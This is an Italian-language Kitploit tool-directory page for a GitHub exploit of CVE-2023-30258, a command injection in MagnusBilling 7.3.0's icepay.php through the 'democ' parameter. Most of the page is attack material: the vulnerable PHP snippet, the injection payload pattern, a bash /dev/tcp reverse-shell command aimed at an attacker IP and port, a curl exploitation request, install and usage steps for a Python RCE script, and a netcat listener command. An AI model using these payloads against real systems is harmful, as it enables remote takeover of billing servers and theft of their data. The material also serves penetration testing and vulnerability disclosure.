Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
magnus_billing_7.3.0_RCE_CVE-2023-30258 — Exploit per CVE-2023-30258: esecuzione remota di codice in MagnusBilling 7.3.0 tramite il parametro 'democ' non sanificato in icepay.php, che consente l'iniezione di comandi e una reverse shell. | Kitploit
Strumenti/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

Exploit per CVE-2023-30258: esecuzione remota di codice in MagnusBilling 7.3.0 tramite il parametro 'democ' non sanificato in icepay.php, che consente l'iniezione di comandi e una reverse shell.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
39 mesi faNon ancora revisionato
Condividi

magnus_billing_7.3.0_RCE_CVE-2023-30258

C'è una vulnerabilità di esecuzione remota di codice in magnus billing 7.3.0, nel parametro "democ" della risorsa "icepay.php", dove è possibile uscire dalla query ed eseguire il comando desiderato.

CODICE VULNERABILE

root@kitploit:~
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

Il parametro "democ" viene passato a exec() per creare un nuovo file, ma come si può vedere non c'è alcuna sanitizzazione delle stringhe, e l'attaccante può facilmente eludere il comando touch ed eseguire un comando o addirittura ottenere una reverse shell. Per bypassare l'estensione .txt, possiamo semplicemente aggiungere un altro ";" alla fine della stringa. Il payload finale sarebbe simile a questo:

root@kitploit:~
testfile;<command>;testfile

e questo è come apparirebbe quando passato alla funzione exec():

root@kitploit:~
exec('touch testfile;<command>;testfile.txt');

es. reverse shell:

root@kitploit:~
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')

sfruttamento >:D

potremmo usare curl per ottenere una reverse shell, es.

root@kitploit:~
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile

oppure se preferisci, puoi usare lo script python da questo repository. Installazione:

root@kitploit:~
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # change directory

chmod +x ./magnusbilling_rce.py                                             # add execution permissions to the python script

utilizzo:

root@kitploit:~
./magnusbilling_rce.py -h                                                   # show help

./magnusbilling_rce.py -lh <attacker_ip> -lp <local_port> -u http://<ip/domain>:<port>/

e ultimo ma non meno importante, ricordati di avviare un listener con netcat:

root@kitploit:~
nc -nlvvp <local_port>
Scarica lo strumento